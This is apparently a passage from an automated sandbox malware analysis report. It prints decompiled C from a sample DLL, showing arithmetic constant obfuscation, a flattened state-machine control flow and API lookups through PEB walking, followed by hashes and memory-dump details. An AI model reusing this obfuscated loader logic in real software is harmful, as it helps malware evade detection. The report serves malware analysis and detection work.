GetPEB 3928->3929 3930 2afd1b1 3929->3930 3930->3911 3932 2b00636 3931->3932 3964 2aeeb52 3932->3964 3936 2ae1a59 3935->3936 3937 2aeeb52 GetPEB 3936->3937 3938 2ae1aeb 3937->3938 3938->3925 3940 2b00dcc 3939->3940 3994 2afbb96 3940->3994 3944 2b02d2f 3943->3944 3998 2b031aa 3944->3998 3948 2affe3d 3947->3948 4001 2aec28c 3948->4001 3952 2aeeb52 GetPEB 3951->3952 3953 2aec39e 3952->3953 3953->3925 3955 2af8626 3954->3955 3956 2affe2a GetPEB 3955->3956 3957 2af878e 3956->3957 4009 2b02c24 3957->4009 3962 2b01538 GetPEB 3963 2af87d2 3962->3963 3963->3918 3965 2aeebf7 3964->3965 3966 2aeec1b lstrcmpiW 3964->3966 3970 2af567b 3965->3970 3966->3925 3968 2aeec06 3973 2aeec31 3968->3973 3977 2aef7f7 GetPEB 3970->3977 3972 2af573b 3972->3968 3974 2aeec50 3973->3974 3976 2aeed2e 3974->3976 3978 2ae7e79 3974->3978 3976->3966 3977->3972 3979 2ae7fa7 3978->3979 3986 2ae801a 3979->3986 3982 2ae7fe4 3984 2ae8011 3982->3984 3985 2aeec31 GetPEB 3982->3985 3984->3976 3985->3984 3987 2ae802d 3986->3987 3988 2aeeb52 GetPEB 3987->3988 3989 2ae7fcb 3988->3989 3989->3982 3990 2ae483c 3989->3990 3991 2ae484c 3990->3991 3992 2aeeb52 GetPEB 3991->3992 3993 2ae48d1 3992->3993 3993->3982 3995 2afbbbe 3994->3995 3996 2aeeb52 GetPEB 3995->3996 3997 2afbc5c 3996->3997 3997->3925 3999 2aeeb52 GetPEB 3998->3999 4000 2b02d4b 3999->4000 4000->3925 4002 2aec2a9 4001->4002 4005 2ae76e0 4002->4005 4006 2ae76f8 4005->4006 4007 2aeeb52 GetPEB 4006->4007 4008 2ae7793 4007->4008 4008->3925 4010 2b02c57 4009->4010 4011 2aeeb52 GetPEB 4010->4011 4012 2af87c7 4011->4012 4012->3963 4013 2b01538 4012->4013 4014 2b01548 4013->4014 4015 2aeeb52 GetPEB 4014->4015 4016 2af87ec 4015->4016 4016->3962 4021 2afa2a5 4022 2afa419 4021->4022 4023 2afa467 4022->4023 4029 2af4244 4022->4029 4030 2af425e 4029->4030 4041 2aec5d8 4030->4041 4033 2b03560 4034 2b0357f 4033->4034 4036 2afa44b 4034->4036 4053 2afbddd 4034->4053 4037 2affecb 4036->4037 4038 2affee3 4037->4038 4057 2b02b09 4038->4057 4046 2b028eb 4041->4046 4047 2aeeb52 GetPEB 4046->4047 4048 2aec69c 4047->4048 4049 2af648a 4048->4049 4050 2af64a6 4049->4050 4051 2aeeb52 GetPEB 4050->4051 4052 2aec6b1 4051->4052 4052->4033 4054 2afbdf6 4053->4054 4055 2aeeb52 GetPEB 4054->4055 4056 2afbe7e 4055->4056 4056->4034 4058 2b02b1f 4057->4058 4059 2b028eb GetPEB 4058->4059 4060 2b02bd9 4059->4060 4063 2af0c2a 4060->4063 4064 2af0c42 4063->4064 4065 2aeeb52 GetPEB 4064->4065 4066 2af0ce9 4065->4066 4066->4023 4092 2b036aa 4094 2b03bc2 4092->4094 4093 2aec5d8 GetPEB 4093->4094 4094->4093 4095 2b02b09 GetPEB 4094->4095 4096 2b00db1 GetPEB 4094->4096 4097 2b03df0 4094->4097 4099 2b03dee 4094->4099 4100 2af09dd GetPEB 4094->4100 4104 2b0061d 2 API calls 4094->4104 4105 2b045ca 4094->4105 4109 2afe406 4094->4109 4113 2b027bc 4094->4113 4095->4094 4096->4094 4098 2b01538 GetPEB 4097->4098 4098->4099 4100->4094 4104->4094 4106 2b045fd 4105->4106 4107 2aeeb52 GetPEB 4106->4107 4108 2b046a3 4107->4108 4108->4094 4110 2afe434 4109->4110 4111 2aeeb52 GetPEB 4110->4111 4112 2afe4c9 4111->4112 4112->4094 4114 2b027cf 4113->4114 4115 2aeeb52 GetPEB 4114->4115 4116 2b02873 4115->4116 4116->4094

                                                                                                          Executed Functions

                                                                                                          Function 02AFEFDD, Relevance: 12.9, Strings: 10, Instructions: 360COMMONCrypto
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          C-Code - Quality: 95%
                                                                                                          			E02AFEFDD() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed short* _t381;
				signed int _t393;
				signed int _t395;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				signed int _t405;
				signed int _t415;
				signed int* _t444;
				void* _t445;
				signed int _t449;
				signed int _t450;
				signed short* _t451;
				signed int* _t452;

				_t452 =  &_v1720;
				_v1648 = 0xf9e68a;
				_v1648 = _v1648 ^ 0xa89cfd85;
				_v1648 = _v1648 | 0xe1599fd2;
				_v1648 = _v1648 ^ 0xe97d9ff6;
				_v1592 = 0x52ca29;
				_v1592 = _v1592 + 0xa8c7;
				_v1592 = _v1592 ^ 0x005b0974;
				_v1632 = 0x5fd17f;
				_t397 = 0x55;
				_v1632 = _v1632 / _t397;
				_v1632 = _v1632 + 0x4a14;
				_t395 = 0;
				_v1632 = _v1632 ^ 0x0007d59d;
				_t445 = 0x5f4d19a;
				_v1584 = 0xb2803c;
				_t398 = 0x15;
				_v1584 = _v1584 / _t398;
				_v1584 = _v1584 ^ 0x0001d429;
				_v1700 = 0x18b17c;
				_v1700 = _v1700 >> 4;
				_v1700 = _v1700 << 0xb;
				_v1700 = _v1700 | 0x5bcbde76;
				_v1700 = _v1700 ^ 0x5fd8859a;
				_v1716 = 0x3ed9a0;
				_v1716 = _v1716 >> 2;
				_v1716 = _v1716 | 0xf2214935;
				_v1716 = _v1716 + 0xffff6098;
				_v1716 = _v1716 ^ 0xf2246cf7;
				_v1616 = 0xd3100b;
				_v1616 = _v1616 << 0xb;
				_v1616 = _v1616 ^ 0x988d1f7d;
				_v1576 = 0x49dab3;
				_t399 = 0x41;
				_v1576 = _v1576 / _t399;
				_v1576 = _v1576 ^ 0x00091b0c;
				_v1604 = 0x610b2e;
				_v1604 = _v1604 >> 3;
				_v1604 = _v1604 ^ 0x000d4028;
				_v1708 = 0x5e4148;
				_v1708 = _v1708 * 0x7c;
				_v1708 = _v1708 + 0x543c;
				_v1708 = _v1708 * 0x6e;
				_v1708 = _v1708 ^ 0x9e2c7101;
				_v1580 = 0x8fa7d1;
				_v1580 = _v1580 | 0x5a90bc2e;
				_v1580 = _v1580 ^ 0x5a99780a;
				_v1644 = 0xdfbfec;
				_v1644 = _v1644 ^ 0x5e27e596;
				_v1644 = _v1644 + 0xffff45c7;
				_v1644 = _v1644 ^ 0x5efb0694;
				_v1652 = 0xa5c8eb;
				_v1652 = _v1652 ^ 0x9b43bc99;
				_v1652 = _v1652 * 0x26;
				_v1652 = _v1652 ^ 0x243194e2;
				_v1596 = 0xb87d2a;
				_v1596 = _v1596 ^ 0x06815b6e;
				_v1596 = _v1596 ^ 0x0639024b;
				_v1568 = 0xf0e227;
				_v1568 = _v1568 * 0x3d;
				_v1568 = _v1568 ^ 0x396ce50f;
				_v1572 = 0x747c0d;
				_v1572 = _v1572 + 0xffffb798;
				_v1572 = _v1572 ^ 0x0071a7b9;
				_v1656 = 0x3795ed;
				_v1656 = _v1656 | 0xbce94746;
				_t400 = 0x26;
				_v1656 = _v1656 / _t400;
				_v1656 = _v1656 ^ 0x04ffd641;
				_v1628 = 0xc97098;
				_t401 = 0x3f;
				_v1628 = _v1628 / _t401;
				_v1628 = _v1628 << 2;
				_v1628 = _v1628 ^ 0x0000c1e6;
				_v1664 = 0x186675;
				_v1664 = _v1664 + 0x5979;
				_v1664 = _v1664 + 0xda5e;
				_v1664 = _v1664 ^ 0x0013e2ca;
				_v1672 = 0x37994d;
				_t402 = 0x3c;
				_v1672 = _v1672 / _t402;
				_v1672 = _v1672 << 6;
				_v1672 = _v1672 ^ 0x0033bfe5;
				_v1588 = 0x8a41f;
				_v1588 = _v1588 ^ 0x744a78fd;
				_v1588 = _v1588 ^ 0x744e2179;
				_v1720 = 0x535779;
				_v1720 = _v1720 << 0xd;
				_v1720 = _v1720 + 0x4332;
				_v1720 = _v1720 + 0x735f;
				_v1720 = _v1720 ^ 0x6aed3196;
				_v1692 = 0x449a24;
				_t403 = 0x7f;
				_v1692 = _v1692 / _t403;
				_v1692 = _v1692 >> 0xb;
				_v1692 = _v1692 | 0x1a1cc036;
				_v1692 = _v1692 ^ 0x1a141e74;
				_v1680 = 0xcbdb4c;
				_t404 = 0x32;
				_v1680 = _v1680 / _t404;
				_v1680 = _v1680 + 0xffff62cd;
				_v1680 = _v1680 ^ 0x0005b6c2;
				_v1712 = 0x490fe1;
				_v1712 = _v1712 + 0xffff5c72;
				_v1712 = _v1712 | 0x8d0799de;
				_v1712 = _v1712 + 0xd1c7;
				_v1712 = _v1712 ^ 0x8d59d7bd;
				_v1564 = 0xeb31a6;
				_v1564 = _v1564 + 0x9db9;
				_v1564 = _v1564 ^ 0x00ef2ed2;
				_v1636 = 0x2bc790;
				_v1636 = _v1636 << 0xd;
				_v1636 = _v1636 + 0xc361;
				_v1636 = _v1636 ^ 0x78fc9b03;
				_v1608 = 0x9c27ff;
				_t405 = 0x79;
				_v1608 = _v1608 / _t405;
				_v1608 = _v1608 ^ 0x00083646;
				_v1612 = 0x2811b5;
				_v1612 = _v1612 << 7;
				_v1612 = _v1612 ^ 0x140bb062;
				_v1704 = 0x10f563;
				_v1704 = _v1704 << 7;
				_v1704 = _v1704 + 0x8e91;
				_v1704 = _v1704 >> 1;
				_v1704 = _v1704 ^ 0x043150d1;
				_v1668 = 0xd17281;
				_v1668 = _v1668 + 0xffff6975;
				_v1668 = _v1668 * 5;
				_v1668 = _v1668 ^ 0x041d3199;
				_v1676 = 0x45cf94;
				_v1676 = _v1676 | 0xf5b6f9ff;
				_v1676 = _v1676 ^ 0xf5f7fea4;
				_v1640 = 0xed0f5a;
				_v1640 = _v1640 | 0x16dcab92;
				_v1640 = _v1640 ^ 0xea8ad617;
				_v1640 = _v1640 ^ 0xfc77378a;
				_v1684 = 0xfd4b0d;
				_v1684 = _v1684 ^ 0xf5deb09c;
				_v1684 = _v1684 * 0x14;
				_v1684 = _v1684 ^ 0x26c6ef50;
				_v1600 = 0xb07e76;
				_v1600 = _v1600 + 0x891d;
				_v1600 = _v1600 ^ 0x00bcbcf5;
				_v1660 = 0xdc9573;
				_v1660 = _v1660 | 0xf03871f4;
				_v1660 = _v1660 >> 9;
				_v1660 = _v1660 ^ 0x0071eac7;
				_v1620 = 0x8203d2;
				_v1620 = _v1620 ^ 0xa8466021;
				_v1620 = _v1620 ^ 0xa8c8da0e;
				_v1688 = 0x3e6237;
				_v1688 = _v1688 + 0x1a50;
				_v1688 = _v1688 >> 3;
				_t451 = _v1620;
				_v1688 = _v1688 * 0x2f;
				_v1688 = _v1688 ^ 0x0160f017;
				_v1696 = 0x29d1f1;
				_v1696 = _v1696 + 0xffffde63;
				_v1696 = _v1696 + 0xffff46cf;
				_v1696 = _v1696 * 0x14;
				_v1696 = _v1696 ^ 0x033cdd59;
				_v1624 = 0xc011c7;
				_v1624 = _v1624 + 0xffff119f;
				_v1624 = _v1624 >> 7;
				_v1624 = _v1624 ^ 0x00036cbb;
				while(_t445 != 0x2906f2f) {
					if(_t445 == 0x5f4d19a) {
						E02AFFE2A(_v1592, _v1632, 0x208,  &_v1560);
						_pop(_t405);
						_t445 = 0x2906f2f;
						continue;
					}
					if(_t445 == 0x6d37c50) {
						_t381 = _t451;
						__eflags =  *_t451 - _t395;
						if(__eflags == 0) {
							L17:
							_t445 = 0xfe0ac9e;
							continue;
						} else {
							goto L10;
						}
						do {
							L10:
							__eflags =  *_t381 - 0x2c;
							if( *_t381 != 0x2c) {
								goto L16;
							}
							_t444 =  &_v1560;
							while(1) {
								_t381 =  &(_t381[1]);
								_t415 =  *_t381 & 0x0000ffff;
								__eflags = _t415;
								if(_t415 == 0) {
									break;
								}
								__eflags = _t415 - 0x20;
								if(_t415 == 0x20) {
									break;
								}
								 *_t444 = _t415;
								_t444 =  &(_t444[0]);
								__eflags = _t444;
							}
							_t405 = 0;
							__eflags = 0;
							 *_t444 = 0;
							L16:
							_t381 =  &(_t381[1]);
							__eflags =  *_t381 - _t395;
						} while (__eflags != 0);
						goto L17;
					}
					if(_t445 == 0x88437ca) {
						E02AE1A34(_v1572,  &_v1040, _t405, _t405, _v1656, _v1628, _v1664, _t405, _v1648, _v1672);
						E02B00DB1(_v1588,  &_v520, __eflags, _v1720, _v1572, _v1692);
						_push(_v1636);
						_push(_v1564);
						_push(_v1712);
						_t449 = E02AFE1F8(0x2ae1160, _v1680, __eflags);
						E02B02D0A(_v1612, __eflags,  &_v520, _v1704, _v1668, _v1676, 0x2ae1160, _t451,  &_v1040, _t449);
						_t405 = _t449;
						E02AFFECB(_t405, _v1640, _v1684, _v1600, _v1660);
						_t452 =  &(_t452[0x19]);
						_t445 = 0xc3a6a1c;
						continue;
					}
					if(_t445 == 0xc3a6a1c) {
						_push(_t405);
						E02AF85FF(_v1620, _v1688, __eflags, _t395, _t451, _t395, _v1696, _t395, _v1624);
						_t395 = 1;
						__eflags = 1;
						L23:
						return _t395;
					}
					_t462 = _t445 - 0xfe0ac9e;
					if(_t445 == 0xfe0ac9e) {
						_push(_v1576);
						_push(_v1616);
						_push(_v1716);
						_t450 = E02AFE1F8(0x2ae1120, _v1700, _t462);
						_t393 = E02B0061D(_v1604, _t450,  &_v1560, _v1708, _v1580); // executed
						_t405 = _t450;
						asm("sbb edi, edi");
						_t445 = ( ~_t393 & 0x02221bd6) + 0x6621bf4;
						E02AFFECB(_t405, _v1644, _v1652, _v1596, _v1568);
						_t452 =  &(_t452[9]);
					}
					L20:
					if(_t445 != 0x6621bf4) {
						continue;
					}
					goto L23;
				}
				_t451 = E02AEC307();
				_t445 = 0x6d37c50;
				goto L20;
			}

































































                                                                                                          0x02afefdd
                                                                                                          0x02afefe3
                                                                                                          0x02afefed
                                                                                                          0x02afeff5
                                                                                                          0x02afeffd
                                                                                                          0x02aff005
                                                                                                          0x02aff010
                                                                                                          0x02aff01b
                                                                                                          0x02aff026
                                                                                                          0x02aff038
                                                                                                          0x02aff03d
                                                                                                          0x02aff043
                                                                                                          0x02aff04b
                                                                                                          0x02aff04d
                                                                                                          0x02aff055
                                                                                                          0x02aff05a
                                                                                                          0x02aff06c
                                                                                                          0x02aff071
                                                                                                          0x02aff07a
                                                                                                          0x02aff085
                                                                                                          0x02aff08d
                                                                                                          0x02aff092
                                                                                                          0x02aff097
                                                                                                          0x02aff09f
                                                                                                          0x02aff0a7
                                                                                                          0x02aff0af
                                                                                                          0x02aff0b4
                                                                                                          0x02aff0bc
                                                                                                          0x02aff0c4
                                                                                                          0x02aff0cc
                                                                                                          0x02aff0d4
                                                                                                          0x02aff0d9
                                                                                                          0x02aff0e1
                                                                                                          0x02aff0f3
                                                                                                          0x02aff0f6
                                                                                                          0x02aff0fd
                                                                                                          0x02aff108
                                                                                                          0x02aff113
                                                                                                          0x02aff11b
                                                                                                          0x02aff126
                                                                                                          0x02aff133
                                                                                                          0x02aff137
                                                                                                          0x02aff144
                                                                                                          0x02aff148
                                                                                                          0x02aff150
                                                                                                          0x02aff15b
                                                                                                          0x02aff166
                                                                                                          0x02aff171
                                                                                                          0x02aff179
                                                                                                          0x02aff181
                                                                                                          0x02aff189
                                                                                                          0x02aff191
                                                                                                          0x02aff199
                                                                                                          0x02aff1a6
                                                                                                          0x02aff1aa
                                                                                                          0x02aff1b2
                                                                                                          0x02aff1bd
                                                                                                          0x02aff1c8
                                                                                                          0x02aff1d3
                                                                                                          0x02aff1e6
                                                                                                          0x02aff1ed
                                                                                                          0x02aff1f8
                                                                                                          0x02aff203
                                                                                                          0x02aff210
                                                                                                          0x02aff21b
                                                                                                          0x02aff223
                                                                                                          0x02aff231
                                                                                                          0x02aff236
                                                                                                          0x02aff23c
                                                                                                          0x02aff244
                                                                                                          0x02aff250
                                                                                                          0x02aff255
                                                                                                          0x02aff25b
                                                                                                          0x02aff260
                                                                                                          0x02aff268
                                                                                                          0x02aff270
                                                                                                          0x02aff278
                                                                                                          0x02aff280
                                                                                                          0x02aff288
                                                                                                          0x02aff294
                                                                                                          0x02aff299
                                                                                                          0x02aff29f
                                                                                                          0x02aff2a4
                                                                                                          0x02aff2ac
                                                                                                          0x02aff2b7
                                                                                                          0x02aff2c2
                                                                                                          0x02aff2cd
                                                                                                          0x02aff2d5
                                                                                                          0x02aff2da
                                                                                                          0x02aff2e2
                                                                                                          0x02aff2ea
                                                                                                          0x02aff2f2
                                                                                                          0x02aff2fe
                                                                                                          0x02aff303
                                                                                                          0x02aff309
                                                                                                          0x02aff30e
                                                                                                          0x02aff316
                                                                                                          0x02aff31e
                                                                                                          0x02aff32a
                                                                                                          0x02aff32f
                                                                                                          0x02aff335
                                                                                                          0x02aff33d
                                                                                                          0x02aff345
                                                                                                          0x02aff34d
                                                                                                          0x02aff355
                                                                                                          0x02aff35d
                                                                                                          0x02aff365
                                                                                                          0x02aff36d
                                                                                                          0x02aff378
                                                                                                          0x02aff383
                                                                                                          0x02aff38e
                                                                                                          0x02aff396
                                                                                                          0x02aff39b
                                                                                                          0x02aff3a3
                                                                                                          0x02aff3ab
                                                                                                          0x02aff3bd
                                                                                                          0x02aff3c0
                                                                                                          0x02aff3c7
                                                                                                          0x02aff3d2
                                                                                                          0x02aff3da
                                                                                                          0x02aff3df
                                                                                                          0x02aff3e7
                                                                                                          0x02aff3ef
                                                                                                          0x02aff3f4
                                                                                                          0x02aff3fc
                                                                                                          0x02aff400
                                                                                                          0x02aff408
                                                                                                          0x02aff410
                                                                                                          0x02aff41d
                                                                                                          0x02aff421
                                                                                                          0x02aff429
                                                                                                          0x02aff431
                                                                                                          0x02aff439
                                                                                                          0x02aff441
                                                                                                          0x02aff449
                                                                                                          0x02aff451
                                                                                                          0x02aff459
                                                                                                          0x02aff461
                                                                                                          0x02aff469
                                                                                                          0x02aff476
                                                                                                          0x02aff47a
                                                                                                          0x02aff482
                                                                                                          0x02aff48d
                                                                                                          0x02aff498
                                                                                                          0x02aff4a3
                                                                                                          0x02aff4ab
                                                                                                          0x02aff4b3
                                                                                                          0x02aff4b8
                                                                                                          0x02aff4c0
                                                                                                          0x02aff4c8
                                                                                                          0x02aff4d0
                                                                                                          0x02aff4d8
                                                                                                          0x02aff4e0
                                                                                                          0x02aff4e8
                                                                                                          0x02aff4f2
                                                                                                          0x02aff4f6
                                                                                                          0x02aff4fa
                                                                                                          0x02aff502
                                                                                                          0x02aff50a
                                                                                                          0x02aff512
                                                                                                          0x02aff51f
                                                                                                          0x02aff523
                                                                                                          0x02aff52b
                                                                                                          0x02aff533
                                                                                                          0x02aff53b
                                                                                                          0x02aff540
                                                                                                          0x02aff548
                                                                                                          0x02aff55a
                                                                                                          0x02aff72e
                                                                                                          0x02aff734
                                                                                                          0x02aff735
                                                                                                          0x00000000
                                                                                                          0x02aff735
                                                                                                          0x02aff566
                                                                                                          0x02aff6d1
                                                                                                          0x02aff6d3
                                                                                                          0x02aff6d7
                                                                                                          0x02aff70c
                                                                                                          0x02aff70c
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02aff6d9
                                                                                                          0x02aff6d9
                                                                                                          0x02aff6d9
                                                                                                          0x02aff6dd
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02aff6df
                                                                                                          0x02aff6f4
                                                                                                          0x02aff6f4
                                                                                                          0x02aff6f7
                                                                                                          0x02aff6fa
                                                                                                          0x02aff6fd
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02aff6e8
                                                                                                          0x02aff6ec
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02aff6ee
                                                                                                          0x02aff6f1
                                                                                                          0x02aff6f1
                                                                                                          0x02aff6f1
                                                                                                          0x02aff6ff
                                                                                                          0x02aff6ff
                                                                                                          0x02aff701
                                                                                                          0x02aff704
                                                                                                          0x02aff704
                                                                                                          0x02aff707
                                                                                                          0x02aff707
                                                                                                          0x00000000
                                                                                                          0x02aff6d9
                                                                                                          0x02aff572
                                                                                                          0x02aff62f
                                                                                                          0x02aff64e
                                                                                                          0x02aff653
                                                                                                          0x02aff65c
                                                                                                          0x02aff663
                                                                                                          0x02aff673
                                                                                                          0x02aff6a2
                                                                                                          0x02aff6ab
                                                                                                          0x02aff6bf
                                                                                                          0x02aff6c4
                                                                                                          0x02aff6c7
                                                                                                          0x00000000
                                                                                                          0x02aff6c7
                                                                                                          0x02aff57e
                                                                                                          0x02aff760
                                                                                                          0x02aff778
                                                                                                          0x02aff782
                                                                                                          0x02aff782
                                                                                                          0x02aff786
                                                                                                          0x02aff78f
                                                                                                          0x02aff78f
                                                                                                          0x02aff584
                                                                                                          0x02aff58a
                                                                                                          0x02aff590
                                                                                                          0x02aff59c
                                                                                                          0x02aff5a0
                                                                                                          0x02aff5b4
                                                                                                          0x02aff5cb
                                                                                                          0x02aff5d9
                                                                                                          0x02aff5ef
                                                                                                          0x02aff5f7
                                                                                                          0x02aff5fd
                                                                                                          0x02aff602
                                                                                                          0x02aff602
                                                                                                          0x02aff752
                                                                                                          0x02aff758
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02aff75e
                                                                                                          0x02aff74b
                                                                                                          0x02aff74d
                                                                                                          0x00000000

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: |t$(@$7b>$<T$HA^$_s$t[$y!Nt$yWS$yY
                                                                                                          • API String ID: 0-3414766599
                                                                                                          • Opcode ID: 950ebc7ead9296454e78a34ab6e7f36ea71b94ccaf24b587b7cf13fa71dd892b
                                                                                                          • Instruction ID: 953b47c1200179e96f61aa2675269850b299ec3e59d4570f4b3ee4fb60c3482a
                                                                                                          • Opcode Fuzzy Hash: 950ebc7ead9296454e78a34ab6e7f36ea71b94ccaf24b587b7cf13fa71dd892b
                                                                                                          • Instruction Fuzzy Hash: A70201715083809FD3A8CF65C489A5BBBE2FBC5318F50890DF299862A0DBB59949CF43
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02B0061D, Relevance: 1.3, APIs: 1, Instructions: 52stringCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 46 2b0061d-2b006eb call 2affe29 call 2aeeb52 lstrcmpiW
                                                                                                          C-Code - Quality: 79%
                                                                                                          			E02B0061D(signed int __ecx, WCHAR* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t44;
				int _t53;
				WCHAR* _t56;

				_push(_a12);
				_t56 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E02AFFE29(_t44);
				_v24 = _v24 & 0x00000000;
				_v28 = 0xcd60b7;
				_v12 = 0x7257ab;
				_v12 = _v12 << 0xd;
				_v12 = _v12 + 0x8f69;
				_v12 = _v12 * 0x4c;
				_v12 = _v12 ^ 0x410f7a13;
				_v8 = 0x7b4696;
				_v8 = _v8 + 0xffff4950;
				_v8 = _v8 | 0x2a0f624b;
				_v8 = _v8 * 0x3a;
				_v8 = _v8 ^ 0xa0f3ec54;
				_v20 = 0x8a2161;
				_v20 = _v20 + 0xffff45ea;
				_v20 = _v20 ^ 0x1b6c7fa6;
				_v20 = _v20 ^ 0x1be8dede;
				_v16 = 0xdcc12a;
				_v16 = _v16 + 0xb9f4;
				_v16 = _v16 + 0xffffcfef;
				_v16 = _v16 ^ 0x00d9de04;
				E02AEEB52(__ecx, __ecx, 0xb7861dce, 0x3e, 0xa2289af1);
				_t53 = lstrcmpiW(_a4, _t56); // executed
				return _t53;
			}












                                                                                                          0x02b00624
                                                                                                          0x02b00627
                                                                                                          0x02b00629
                                                                                                          0x02b0062c
                                                                                                          0x02b0062f
                                                                                                          0x02b00630
                                                                                                          0x02b00631
                                                                                                          0x02b00636
                                                                                                          0x02b0063d
                                                                                                          0x02b00644
                                                                                                          0x02b0064b
                                                                                                          0x02b0064f
                                                                                                          0x02b00667
                                                                                                          0x02b0066a
                                                                                                          0x02b00671
                                                                                                          0x02b00678
                                                                                                          0x02b0067f
                                                                                                          0x02b0068b
                                                                                                          0x02b0068e
                                                                                                          0x02b00695
                                                                                                          0x02b0069c
                                                                                                          0x02b006a3
                                                                                                          0x02b006aa
                                                                                                          0x02b006b1
                                                                                                          0x02b006b8
                                                                                                          0x02b006bf
                                                                                                          0x02b006c6
                                                                                                          0x02b006d9
                                                                                                          0x02b006e5
                                                                                                          0x02b006eb

                                                                                                          APIs
                                                                                                          • lstrcmpiW.KERNELBASE(410F7A13,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 02B006E5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: lstrcmpi
                                                                                                          • String ID:
                                                                                                          • API String ID: 1586166983-0
                                                                                                          • Opcode ID: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
                                                                                                          • Instruction ID: f9039934a53335493250a58fc8fcb0fcf5843877e66d2cb1034c0bbd43a00cc7
                                                                                                          • Opcode Fuzzy Hash: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
                                                                                                          • Instruction Fuzzy Hash: 5B2110B1C01309ABCF14DFA9D9899DEBFB5FB20354F108298E529A6251E3B48B04CF90
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Non-executed Functions

                                                                                                          Function 02AE8636, Relevance: 39.9, Strings: 31, Instructions: 1175COMMONCrypto
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
